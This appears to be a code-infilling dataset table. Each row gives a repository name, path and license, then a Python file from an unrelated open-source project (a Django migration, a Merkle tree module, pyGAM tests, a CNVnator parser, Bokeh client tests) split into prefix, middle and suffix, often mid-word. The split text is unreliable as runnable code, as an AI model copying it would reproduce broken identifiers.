repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
MrSenko/Nitrate | tcms/testcases/migrations/0001_initial.py | Python | gpl-2.0 | 9,258 | 0.002916 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import tcms.core.models.base
from django.conf import setti | ngs
import tcms.core.models.fields
class Migration(migrations.Migration):
dependencies = [
('management', '0001_initial'),
('testplans', '0001_init | ial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('object_pk', models.PositiveIntegerField(null=True, verbose_name=b'object ID', blank=True)),
('name', models.CharField(max_length=50)),
('email', models.EmailField(max_length=254, db_index=True)),
('date_joined', models.DateTimeField(auto_now_add=True)),
],
options={
'db_table': 'tcms_contacts',
},
),
migrations.CreateModel(
name='TestCase',
fields=[
('case_id', models.AutoField(max_length=10, serialize=False, primary_key=True)),
('create_date', models.DateTimeField(auto_now_add=True, db_column=b'creation_date')),
('is_automated', models.IntegerField(default=0, db_column=b'isautomated')),
('is_automated_proposed', models.BooleanField(default=False)),
('script', models.TextField(blank=True)),
('arguments', models.TextField(blank=True)),
('extra_link', models.CharField(default=None, max_length=1024, null=True, blank=True)),
('summary', models.CharField(max_length=255, blank=True)),
('requirement', models.CharField(max_length=255, blank=True)),
('alias', models.CharField(max_length=255, blank=True)),
('estimated_time', tcms.core.models.fields.DurationField(default=0, db_column=b'estimated_time')),
('notes', models.TextField(blank=True)),
],
options={
'db_table': 'test_cases',
},
bases=(models.Model, tcms.core.models.base.UrlMixin),
),
migrations.CreateModel(
name='TestCaseAttachment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
'db_table': 'test_case_attachments',
},
),
migrations.CreateModel(
name='TestCaseBug',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('bug_id', models.CharField(max_length=25)),
('summary', models.CharField(max_length=255, null=True, blank=True)),
('description', models.TextField(null=True, blank=True)),
],
options={
'db_table': 'test_case_bugs',
},
bases=(models.Model, tcms.core.models.base.UrlMixin),
),
migrations.CreateModel(
name='TestCaseBugSystem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('description', models.TextField(blank=True)),
('url_reg_exp', models.CharField(max_length=8192)),
('validate_reg_exp', models.CharField(max_length=128)),
],
options={
'db_table': 'test_case_bug_systems',
},
bases=(models.Model, tcms.core.models.base.UrlMixin),
),
migrations.CreateModel(
name='TestCaseCategory',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column=b'category_id')),
('name', models.CharField(max_length=255)),
('description', models.TextField(blank=True)),
('product', models.ForeignKey(related_name='category', to='management.Product')),
],
options={
'db_table': 'test_case_categories',
'verbose_name_plural': 'test case categories',
},
bases=(models.Model, tcms.core.models.base.UrlMixin),
),
migrations.CreateModel(
name='TestCaseComponent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('case', models.ForeignKey(to='testcases.TestCase')),
('component', models.ForeignKey(to='management.Component')),
],
options={
'db_table': 'test_case_components',
},
),
migrations.CreateModel(
name='TestCaseEmailSettings',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('notify_on_case_update', models.BooleanField(default=False)),
('notify_on_case_delete', models.BooleanField(default=False)),
('auto_to_case_author', models.BooleanField(default=False)),
('auto_to_case_tester', models.BooleanField(default=False)),
('auto_to_run_manager', models.BooleanField(default=False)),
('auto_to_run_tester', models.BooleanField(default=False)),
('auto_to_case_run_assignee', models.BooleanField(default=False)),
('case', models.OneToOneField(related_name='email_settings', to='testcases.TestCase')),
],
),
migrations.CreateModel(
name='TestCasePlan',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('sortkey', models.IntegerField(null=True, blank=True)),
('case', models.ForeignKey(to='testcases.TestCase')),
('plan', models.ForeignKey(to='testplans.TestPlan')),
],
options={
'db_table': 'test_case_plans',
},
),
migrations.CreateModel(
name='TestCaseStatus',
fields=[
('id', models.AutoField(max_length=6, serialize=False, primary_key=True, db_column=b'case_status_id')),
('name', models.CharField(max_length=255)),
('description', models.TextField(null=True, blank=True)),
],
options={
'db_table': 'test_case_status',
'verbose_name': 'Test case status',
'verbose_name_plural': 'Test case status',
},
bases=(models.Model, tcms.core.models.base.UrlMixin),
),
migrations.CreateModel(
name='TestCaseTag',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('user', models.IntegerField(default=b'0', db_column=b'userid')),
('case', models.ForeignKey(to='testcases.TestCase')),
('tag', models.ForeignKey(to='management.TestTag')),
],
options={
'db_table': 'test_case_tags',
},
),
migrations.CreateModel(
name='TestCaseText',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('case_text_version', models.IntegerField()),
('create_date', models.DateTimeField(auto_now_add=True, db_column=b'creation_ts')),
('action', models.TextField(blank=True)),
('effect', models.TextField(blank=True)),
('setup', models.TextField(blank=True)),
('breakdown', models.TextField(blank=True)),
|
Yukarumya/Yukarum-Redfoxes | testing/mozharness/mozharness/mozilla/merkle.py | Python | mpl-2.0 | 6,058 | 0.002146 | #!/usr/bin/env python
import struct
def _round2(n):
k = 1
while k < n:
k <<= 1
return k >> 1
def _leaf_hash(hash_fn, leaf):
return hash_fn(b'\x00' + leaf).digest()
def _pair_hash(hash_fn, left, right):
return hash_fn(b'\x01' + left + right).digest()
class InclusionProof:
"""
Represents a Merkle inclusion proof for purposes of serialization,
deserialization, and verification of the proof. The format for inclusion
proofs in RFC 6962-bis is as follows:
opaque LogID<2..127>; |
opaque NodeHash<32..2^8-1>;
struct {
LogID log_id;
uint64 tree_size;
uint64 leaf_inde | x;
NodeHash inclusion_path<1..2^16-1>;
} InclusionProofDataV2;
In other words:
- 1 + N octets of log_id (currently zero)
- 8 octets of tree_size = self.n
- 8 octets of leaf_index = m
- 2 octets of path length, followed by
* 1 + N octets of NodeHash
"""
# Pre-generated 'log ID'. Not used by Firefox; it is only needed because
# there's a slot in the RFC 6962-bis format that requires a value at least
# two bytes long (plus a length byte).
LOG_ID = b'\x02\x00\x00'
def __init__(self, tree_size, leaf_index, path_elements):
self.tree_size = tree_size
self.leaf_index = leaf_index
self.path_elements = path_elements
@staticmethod
def from_rfc6962_bis(serialized):
start = 0
read = 1
if len(serialized) < start + read:
raise Exception('Inclusion proof too short for log ID header')
log_id_len, = struct.unpack('B', serialized[start:start+read])
start += read
start += log_id_len # Ignore the log ID itself
read = 8 + 8 + 2
if len(serialized) < start + read:
raise Exception('Inclusion proof too short for middle section')
tree_size, leaf_index, path_len = struct.unpack('!QQH', serialized[start:start+read])
start += read
path_elements = []
end = 1 + log_id_len + 8 + 8 + 2 + path_len
while start < end:
read = 1
if len(serialized) < start + read:
raise Exception('Inclusion proof too short for middle section')
elem_len, = struct.unpack('!B', serialized[start:start+read])
start += read
read = elem_len
if len(serialized) < start + read:
raise Exception('Inclusion proof too short for middle section')
if end < start + read:
raise Exception('Inclusion proof element exceeds declared length')
path_elements.append(serialized[start:start+read])
start += read
return InclusionProof(tree_size, leaf_index, path_elements)
def to_rfc6962_bis(self):
inclusion_path = b''
for step in self.path_elements:
step_len = struct.pack('B', len(step))
inclusion_path += step_len + step
middle = struct.pack('!QQH', self.tree_size, self.leaf_index, len(inclusion_path))
return self.LOG_ID + middle + inclusion_path
def _expected_head(self, hash_fn, leaf, leaf_index, tree_size):
node = _leaf_hash(hash_fn, leaf)
# Compute indicators of which direction the pair hashes should be done.
# Derived from the PATH logic in draft-ietf-trans-rfc6962-bis
lr = []
while tree_size > 1:
k = _round2(tree_size)
left = leaf_index < k
lr = [left] + lr
if left:
tree_size = k
else:
tree_size = tree_size - k
leaf_index = leaf_index - k
assert(len(lr) == len(self.path_elements))
for i, elem in enumerate(self.path_elements):
if lr[i]:
node = _pair_hash(hash_fn, node, elem)
else:
node = _pair_hash(hash_fn, elem, node)
return node
def verify(self, hash_fn, leaf, leaf_index, tree_size, tree_head):
return self._expected_head(hash_fn, leaf, leaf_index, tree_size) == tree_head
class MerkleTree:
"""
Implements a Merkle tree on a set of data items following the
structure defined in RFC 6962-bis. This allows us to create a
single hash value that summarizes the data (the 'head'), and an
'inclusion proof' for each element that connects it to the head.
https://tools.ietf.org/html/draft-ietf-trans-rfc6962-bis-24
"""
def __init__(self, hash_fn, data):
self.n = len(data)
self.hash_fn = hash_fn
# We cache intermediate node values, as a dictionary of dictionaries,
# where the node representing data elements data[m:n] is represented by
# nodes[m][n]. This corresponds to the 'D[m:n]' notation in RFC
# 6962-bis. In particular, the leaves are stored in nodes[i][i+1] and
# the head is nodes[0][n].
self.nodes = {}
for i in range(self.n):
self.nodes[i, i+1] = _leaf_hash(self.hash_fn, data[i])
def _node(self, start, end):
if (start, end) in self.nodes:
return self.nodes[start, end]
k = _round2(end - start)
left = self._node(start, start + k)
right = self._node(start + k, end)
node = _pair_hash(self.hash_fn, left, right)
self.nodes[start, end] = node
return node
def head(self):
return self._node(0, self.n)
def _relative_proof(self, target, start, end):
n = end - start
k = _round2(n)
if n == 1:
return []
elif target - start < k:
return self._relative_proof(target, start, start + k) + [self._node(start + k, end)]
elif target - start >= k:
return self._relative_proof(target, start + k, end) + [self._node(start, start + k)]
def inclusion_proof(self, leaf_index):
path_elements = self._relative_proof(leaf_index, 0, self.n)
return InclusionProof(self.n, leaf_index, path_elements)
|
morucci/repoxplorer | repoxplorer/controllers/projects.py | Python | apache-2.0 | 2,146 | 0 | # Copyright 2017, Fabien Boucher
# Copyright 2017, Red Hat
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTI | ES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict
from pecan import abort
from pecan import expose
from repoxplorer import version
from repoxplorer.index.projects | import Projects
rx_version = version.get_version()
class ProjectsController(object):
@expose('json')
def projects(self, pid=None):
projects_index = Projects()
if pid:
project = projects_index.get(pid)
if not project:
abort(404, detail="Project ID has not been found")
return {pid: projects_index.get(pid)}
else:
projects = projects_index.get_projects(
source=['name', 'description', 'logo', 'refs'])
_projects = OrderedDict(
sorted(list(projects.items()), key=lambda t: t[0]))
return {'projects': _projects,
'tags': projects_index.get_tags()}
@expose('json')
def repos(self, pid=None, tid=None):
projects_index = Projects()
if not pid and not tid:
abort(404,
detail="A tag ID or project ID must be passed as parameter")
if pid:
project = projects_index.get(pid)
else:
if tid in projects_index.get_tags():
refs = projects_index.get_references_from_tags(tid)
project = {'refs': refs}
else:
project = None
if not project:
abort(404,
detail='Project ID or Tag ID has not been found')
return project['refs']
|
asiroliu/AnalysisWinPIRALog | AnalysisWinPIRALog_LINUX.py | Python | gpl-2.0 | 14,575 | 0.003019 | # coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
"""
Name: AnalysisWinPIRALog_LINUX
Author: Andy Liu
Email : andy.liu.ud@hotmail.com
Created: 3/24/2015
Copyright: Copyright ©Intel Corporation. All rights reserved.
Licence: This program is free software: you can redistribute it
and/or modify it under the terms of the GNU General Public License
as published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import argparse
import logging
import os
import re
import sys
import xlwt
from copy import deepcopy
from pprint import pformat
from AnalysisWinPIRALog.MyLog import init_logger
from encoder import XML2Dict
class AnalysisLog:
def __init__(self, _config_file, _log_file):
self._config_file = _config_file
self._log_file = _log_file
self.config_dict = dict()
self.log_dict = dict()
self.result_list = list()
self.start = re.compile(r'^[0-9a-f]{2}:[0-9a-f]{2}\.\d')
self._key_word = 'DEV_NAME'
self.return_value = True
def parse_config_file(self):
logging.debug('Into function parse_config_file')
with open(self._config_file, 'r') as f:
_xml_str = f.read()
try:
_obj = XML2Dict(coding='utf-8')
self.config_dict = _obj.parse(_xml_str)
logging.debug('config_dict : %s' % pformat(self.config_dict))
logging.info('Parse config file done')
return self.config_dict
except Exception, e:
logging.error("Can't parse as XML!")
logging.exception(e)
sys.exit(1)
# def warning_duplicate_dev_add(self):
# logging.debug('Into warning_duplicate_dev_add')
# _verify_list = list()
# for _dev_type, _expect_values in self.config_dict.get('xml').iteritems():
# if isinstance(_expect_values, list):
# for _expect_value in _expect_values:
# if _expect_value.get(self._key_word) in _verify_list:
# logging.error('Duplicate device address : %s' % _expect_value.get(self._key_word))
# sys.exit(1)
# else:
# _verify_list.append(_expect_value.get(self._key_word))
# elif isinstance(_expect_values, dict):
# if _expect_values.get(self._key_word) in _verify_list:
# logging.error('Duplicate device address : %s' % _expect_values.get(self._key_word))
# sys.exit(1)
# else:
# _verify_list.append(_expect_values.get(self._key_word))
# if len(_verify_list) == 0:
# logging.error("Can't find key word <%s>" % self._key_word)
# sys.exit(1)
# logging.info('Verify duplicate device address done')
# return True
def parse_log_file(self):
logging.debug('Into parse_log_file')
_record = dict()
_dev_name = ''
with open(self._log_file, 'r') as f:
# remove header and footer in log file
for _line in f.readlines():
_line = _line.strip()
if _line and ':' in _line:
if re.findall(self.start, _line):
if _record:
self.log_dict.update({_dev_name.strip(): deepcopy(_record)})
_record.clear()
_bus_no, _dev_name = _line.split(' ', 1)
_record.update({'BUS_NO': _bus_no.strip(), 'DEV_NAME': _dev_name.strip()})
else:
_key, _value = _line.split(':', 1)
_record.update({_key.strip(): _value.strip()})
else:
self.log_dict.update({_dev_name.strip(): deepcopy(_record)})
pass
logging.debug('log_dict : %s' % pformat(self.log_dict))
logging.info('Parse log file done')
return self.log_dict
def verify_result(self):
for _dev_type, _expect_values in self.config_dict.get('xml').iteritems():
if isinstance(_expect_values, list):
logging.debug('_expect_values is list')
for _expect_value in _expect_values:
_key_word = _expect_value.get(self._key_word)
if _key_word in self.log_dict:
_record = self.log_dict.get(_key_word)
if self.compare_result(_expect_value, _record):
_record.update({'Result': 'PASSED'})
else:
_record.update({'Result': 'FAILED'})
self.return_value = False
self.result_list.append(_record)
else:
self.result_list.append({self._key_word: _key_word, 'Result': 'Not Found'})
self.return_value = False
elif isinstance(_expect_values, dict):
logging.debug('_expect_values is dict')
_key_word = _expect_values.get(self._key_word)
if _key_word in self.log_dict:
_record = self.log_dict.get(_key_word)
if self.compare_result(_expect_values, _record):
_record.update({'Result': 'PASSED'})
else:
_record.update({'Result': 'FAILED'})
self.return_value = False
self.result_list.append(_record)
else:
self.result_list.append({self._key_word: _key_word, 'Result': 'Not Found'})
self.return_value = False
logging.debug('result_list : %s' % pformat(self.result_list))
logging.info('Verify result done')
@staticmethod
def compare_result(_expect_value, _record):
"""
expect_value:
{'DEV_NAME': 'PCI bridge: Intel Corporation Haswell-E PCI Express Root Port 1 (rev 02) (prog-if 00 [Normal decode])'}
_record:
{'ACSCap': 'SrcValid+ TransBlk+ ReqRedir+ CmpltRedir+ UpstreamFwd+ EgressCtrl- DirectTrans-',
'ACSCtl': 'SrcValid- TransBlk- ReqRedir- CmpltRedir- UpstreamFwd- EgressCtrl- DirectTrans-',
'AERCap': 'First Error Pointer: 00, GenCap- CGenEn- ChkCap- ChkEn-',
'Address': 'fee00438 Data: 0000',
'BUS_NO': '00:01.0',
'BridgeCtl': 'Parity+ SERR+ NoISA- VGA- MAbort- >Reset- FastB2B-',
'Bus': 'primary=00, secondary=01, subordinate=01, sec-latency=0',
'CEMsk': 'RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr-',
'CESta': 'RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr-',
'Capabilities': '[300 v1] Vendor Specific Information: ID=0008 Rev=0 Len=038 <?>',
'Changed': 'MRL- PresDet- LinkState+',
'Compliance De-emphasis': '-6dB',
'Control': 'AttnInd Off, PwrInd O | ff, Power- Interlock-',
'DEV_NAME': 'PCI bridge: Intel Corporation Haswell-E PCI Express Root Port 1 (rev 02) (prog-if 00 [Normal decode])',
'DevCap': 'MaxPayload 256 bytes, PhantFunc 0, Latency L0s <64ns, L1 <1us',
'DevCap2': 'Completion Timeout: Range BCD, TimeoutDis+, LTR-, OBFF Not Supported ARIFwd+',
'DevCtl': 'Report errors: Correctable- Non-Fatal+ Fatal+ Unsupported-',
| 'DevCtl2': 'Completion Timeout: 260ms to 900ms, TimeoutDis-, LTR-, OBFF Disabled ARIFwd+',
'DevSta': 'CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend-',
'Flags': 'PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+)',
'I/O behind bridge': '0000f000-00000fff',
'Kernel drive |
jim-cooley/abletonremotescripts | remote-scripts/samples/Launchpad95/__init__.py | Python | apache-2.0 | 425 | 0.016471 | from Launchpad import Launchpad
def create_instance(c_instance):
""" Creates and returns the Launchpad script """
return Launchpad(c_instance)
from _Framework.Capab | ilities import | * # noqa
def get_capabilities():
return {
CONTROLLER_ID_KEY: controller_id(vendor_id=4661, product_ids=[14], model_name='Launchpad'),
PORTS_KEY: [inport(props=[NOTES_CC, REMOTE, SCRIPT]), outport(props=[NOTES_CC, REMOTE, SCRIPT])]}
|
chambers-brian/SIG_Digital-Strategy_SI_ODP_Backend | dataactvalidator/scripts/loadFile.py | Python | cc0-1.0 | 4,378 | 0.001142 | import os
import logging
import pandas as pd
from dataactvalidator.app import createApp
from dataactvalidator.scripts.loaderUtils import LoaderUtils
from dataactcore.interfaces.db import GlobalDB
from dataactcore.models.domainModels import CGAC, ObjectClass, ProgramActivity
from dataactcore.config import CONFIG_BROKER
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def loadCgac(filename):
"""Load CGAC (high-level agency names) lookup table."""
model = CGAC
with createApp().app_context():
sess = GlobalDB.db().session
# for CGAC, delete and replace values
sess.query(model).delete()
# read CGAC values from csv
data = pd.read_csv(filename, dtype=str)
# clean data
data = LoaderUtils.cleanData(
data,
model,
{"cgac": "cgac_code", "agency": "agency_name"},
{"cgac_code": {"pad_to_length": 3}}
)
# de-dupe
data.drop_duplicates(subset=['cgac_code'], inplace=True)
# insert to db
table_name = model.__table__.name
num = LoaderUtils.insertDataframe(data, table_name, sess.connection())
sess.commit()
logger.info('{} records inserted to {}'.format(num, table_name))
def loadObjectClass(filename):
"""Load object class lookup table."""
model = ObjectClass
with createApp().app_context():
sess = GlobalDB.db().session
# for object class, delete and replace values
sess.query(model).delete()
data = pd.read_csv(filename, dtype=str)
data = LoaderUtils.cleanData(
data,
model,
{"max_oc_code": "object_class_code",
"max_object_class_name": "object_class_name"},
{}
)
# de-dupe
data.drop_duplicates(subset=['object_class_code'], inplace=True)
# insert to db
table_name = model.__table__.name
num = LoaderUtils.insertDataframe(data, table_name, sess.connection())
sess.commit()
logger.info('{} records inserted to {}'.format(num, table_name))
def loadProgramActivity(filename):
"""Load program activity lookup table."""
model = ProgramActivity
with createApp().app_context():
sess = GlobalDB.db().session
# for program activity, delete and replace values??
sess.query(model).delete()
data = pd.read_csv(filename, dtype=str)
data = LoaderUtils.cleanData(
data,
model,
{"year": "budget_year",
"agency_id": "agency_id",
"alloc_id": "allocation_transfer_id",
"account": "account_number",
"pa_code": "program_activity_code",
"pa_name": "program_activity_name"},
{"program_activity_code": {"pad_to_length": 4},
"ag | ency_id": {"pad_to_length": 3},
"allocation_transfer_id": {"pad_to_length": 3, "keep_null": True},
"account_number": {"pad_to_length": 4}
}
)
# because we're only loading a subset of program activity info,
# | there will be duplicate records in the dataframe. this is ok,
# but need to de-duped before the db load.
data.drop_duplicates(inplace=True)
# insert to db
table_name = model.__table__.name
num = LoaderUtils.insertDataframe(data, table_name, sess.connection())
sess.commit()
logger.info('{} records inserted to {}'.format(num, table_name))
def loadDomainValues(basePath, localProgramActivity = None):
"""Load all domain value files.
Parameters
----------
basePath : directory that contains the domain values files.
localProgramActivity : optional location of the program activity file (None = use basePath)
"""
logger.info('Loading CGAC')
loadCgac(os.path.join(basePath,"cgac.csv"))
logger.info('Loading object class')
loadObjectClass(os.path.join(basePath,"object_class.csv"))
logger.info('Loading program activity')
if localProgramActivity is not None:
loadProgramActivity(localProgramActivity)
else:
loadProgramActivity(os.path.join(basePath, "program_activity.csv"))
if __name__ == '__main__':
loadDomainValues(
os.path.join(CONFIG_BROKER["path"], "dataactvalidator", "config")
)
|
kurikaesu/pytrade | PyTrade/source/models/user.py | Python | gpl-3.0 | 2,792 | 0.001074 | from ..core import *
class User:
# Data header indexes
USERNAME = 0
ENCRYPTED_NAME = 1
SALT = 2
PROFILE = 3
# data header in the user table
COLUMN_HEADERS = [
'username',
'encrypted_name',
'salt',
'profile',
]
# variables to be stored in db
__id = None
__username = None
__encrypted_name = None
__salt = None
__profile = None
# variables for runtime
__crypt = None
__data = {'column_headers': COLUMN_HEADERS}
def __init__(self, username):
self.__username = username
self.__profile = ' '
@ | classmethod
def load_user(cls, username, encrypted_username, salt):
user = cls(username)
user.set_salt(salt)
user.set_encrypted_name(encrypted_username)
return cls(username)
def set_salt(self, salt=None):
self.__crypt = Crypt()
if not salt:
salt = Crypt.gen_salt()
self.__crypt.setSalt(salt)
self.__salt = salt
def set_encrypted_name(self, encrypted_username):
self.__encrypted_name = encrypted_username
| def get_username(self):
return self.__username
def get_id(self):
return self.__id
def set_id(self, id):
self.__id = id
print(id)
def get_data(self):
return self.__data
# Wrap user data into a structure for storing into db
def save_data(self):
if not self.__username:
raise RuntimeWarning("Username is not set")
if not self.__encrypted_name:
raise RuntimeWarning("Username is not encrypted")
if not self.__salt:
raise RuntimeWarning("Salt is not created")
if not self.__profile:
raise RuntimeWarning("Profile in not initialised")
# decode all values before storing them in db
self.__data[self.COLUMN_HEADERS[self.USERNAME]] = self.__username.decode()
self.__data[self.COLUMN_HEADERS[self.ENCRYPTED_NAME]] = self.__encrypted_name.decode()
self.__data[self.COLUMN_HEADERS[self.SALT]] = self.__salt.decode()
self.__data[self.COLUMN_HEADERS[self.PROFILE]] = self.__profile
def set_password(self, raw_password):
self.set_salt()
self.__crypt.initWithPassword(raw_password)
self.__encrypted_name = self.__crypt.encryptBytes(self.get_username())
pass
def validate_password(self, raw_password):
if not self.__salt:
raise RuntimeWarning("Password is not set")
res = self.__crypt.validatePassword(
raw_password,
self.__encrypted_name,
self.__username
)
if res:
return True
else:
return False
def get_profile(self):
pass
|
dswah/pyGAM | pygam/tests/test_GAMs.py | Python | apache-2.0 | 2,344 | 0.00384 | # -*- coding: utf-8 -*-
import pytest
from pygam import *
def test_can_build_sub_models():
"""
check that the inits of all the sub-models are correct
"""
LinearGAM()
LogisticGAM()
PoissonGAM()
GammaGAM()
InvGaussGAM()
ExpectileGAM()
assert(True)
def test_LinearGAM_uni(mcycle_X_y):
"""
check that we can fit a Linear GAM on real, univariate data
"""
X, y = mcycle_X_y
gam = LinearGAM().fit(X, y)
assert(gam._is_fitted)
def test_LinearGAM_multi(wage_X_y):
"""
check that we can fit a Linear GAM on real, multivariate data
"""
X, y = wage_X_y
gam = LinearGAM().fit(X, y)
assert(gam._is_fitted)
def test_LogisticGAM(default_X_y):
"""
check that we can fit a Logistic GAM on real data
"""
X, y = default_X_y
gam = LogisticGAM().fit(X, y)
assert(gam._is_fitted)
def test_PoissonGAM(coal_X_y):
"""
check that we can fit a Poisson GAM on real data
"""
X, y = coal_X_y
gam = PoissonGAM().fit(X, y)
assert(gam._is_fitted)
def test_InvGaussGAM(tree | s_X_y):
"""
check that we can fit a InvGauss GAM on real data
"""
X, y = trees_X_y
gam = InvGaussGAM().fit(X, y)
assert(gam._is_fitted)
def test_GammaGAM(trees_X_y):
"""
check that we can fit a Gamma GAM on real data
"""
X, y = trees_X_y
gam = GammaGAM().fit(X, y)
assert(gam._is_fitted)
def test_CustomGAM(trees_X_y):
"""
| check that we can fit a Custom GAM on real data
"""
X, y = trees_X_y
gam = GAM(distribution='gamma', link='inverse').fit(X, y)
assert(gam._is_fitted)
def test_ExpectileGAM_uni(mcycle_X_y):
"""
check that we can fit an Expectile GAM on real, univariate data
"""
X, y = mcycle_X_y
gam = ExpectileGAM().fit(X, y)
assert(gam._is_fitted)
def test_ExpectileGAM_bad_expectiles(mcycle_X_y):
"""
check that get errors for unacceptable expectiles
"""
X, y = mcycle_X_y
with pytest.raises(ValueError):
ExpectileGAM(expectile=0).fit(X, y)
with pytest.raises(ValueError):
ExpectileGAM(expectile=1).fit(X, y)
with pytest.raises(ValueError):
ExpectileGAM(expectile=-0.1).fit(X, y)
with pytest.raises(ValueError):
ExpectileGAM(expectile=1.1).fit(X, y)
# TODO check dicts: DISTRIBUTIONS etc
|
markuz/poster | poster_resources/__init__.py | Python | gpl-3.0 | 988 | 0.001012 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of the Poster project
#
# Copyright (c) 2006-2009 Marco Antonio Islas Cruz
#
# Poster is free software; you can redistribute it and/or modify
# it under the terms of the GNU | General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Poster is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program | ; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# @author Marco Antonio Islas Cruz <markuz@islascruz.org>
# @copyright 2011 Marco Antonio Islas Cruz
# @license http://www.gnu.org/licenses/gpl.txt |
bjtrost/TCAG-WGS-CNV-workflow | CNVnator.py | Python | mit | 1,274 | 0.067504 |
import SV
import os
import re
class CNVnator:
match_calltype={'deletion':'DEL', 'duplication':'DUP'}
CNVtype=0
coordinates=1
CNVsize=2
normalizedRD=3
eval1=4
eval2=5
eval3=6
eval4=7
q0=8
@staticmethod
def parse_coordinates (coordinates):
coord=re.sub (':', '-', coordinates)
E=coord.split ('-')
return E[0], E[1], E[2]
@staticmethod
def doparse ( cnvnator_line ):
E=cnvnator_line.rstrip('\n').split('\t')
chrom, start, end=CNVnator.parse_coordinates(E[CNVnator.coordinates])
calltype=CNVnator.match_calltype[E[CNVnator.CNVtype]]
length=E[CNVnator.CNVsize]
filter=E[CNVnator.eval1]
program='CNVnator'
other=":".join (E)
return SV.SV.format_line (chrom, start, end, calltype, filter, program, other, str(length))
# ------------------------------------------------------------
def __init__ (self, fname):
self.fname=fname
if not os.path.exists (self.fname):
raise Exception ("NO such file: " + self.fname)
# -------------------------------------------------------------
def run ( self ):
f = open (self.fname)
for line in f:
if line[0] == '#': continue
sv_line=CNVnator | .doparse ( line )
if sv_line is not None: print(sv_line)
f.close()
# ---------------------- | ---------------------------------------
|
mindriot101/bokeh | bokeh/client/tests/test_session.py | Python | bsd-3-clause | 6,568 | 0.004415 | #-----------------------------------------------------------------------------
# Co | pyright (c) 2012 - 2018, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#----------------------------------------------------------------- | ------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from mock import patch
# External imports
from six import string_types
# Bokeh imports
# Module under test
import bokeh.client.session as bcs
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_module_docstring_warning():
    """The module docstring must embed the client-app warning body verbatim."""
    body = bcs._BOKEH_CLIENT_APP_WARNING_BODY
    assert body in bcs.__doc__
def test_DEFAULT_SESSION_ID():
    """The fallback session id is the literal string "default"."""
    expected = "default"
    assert bcs.DEFAULT_SESSION_ID == expected
def test_DEFAULT_SERVER_WEBSOCKET_URL():
    """The default websocket endpoint points at a local server on port 5006."""
    expected = "ws://localhost:5006/ws"
    assert bcs.DEFAULT_SERVER_WEBSOCKET_URL == expected
class Test_ClientSession(object):
    """Unit tests for ClientSession construction and connection delegation.

    The underlying ClientConnection is mocked out; these tests only verify
    that ClientSession stores constructor arguments and forwards calls.
    """

    def test_creation_defaults(self):
        s = bcs.ClientSession()
        assert s.connected == False
        assert s.document is None
        assert s._connection._arguments is None
        # Generated ids are 44-character strings.
        assert isinstance(s.id, string_types)
        assert len(s.id) == 44

    def test_creation_with_session_id(self):
        s = bcs.ClientSession("sid")
        assert s.connected == False
        assert s.document is None
        assert s._connection._arguments is None
        assert s.id == "sid"

    def test_creation_with_ws_url(self):
        s = bcs.ClientSession(websocket_url="wsurl")
        assert s.connected == False
        assert s.document is None
        assert s._connection._arguments is None
        assert s._connection.url == "wsurl"
        assert isinstance(s.id, string_types)
        assert len(s.id) == 44

    def test_creation_with_ioloop(self):
        s = bcs.ClientSession(io_loop="io_loop")
        assert s.connected == False
        assert s.document is None
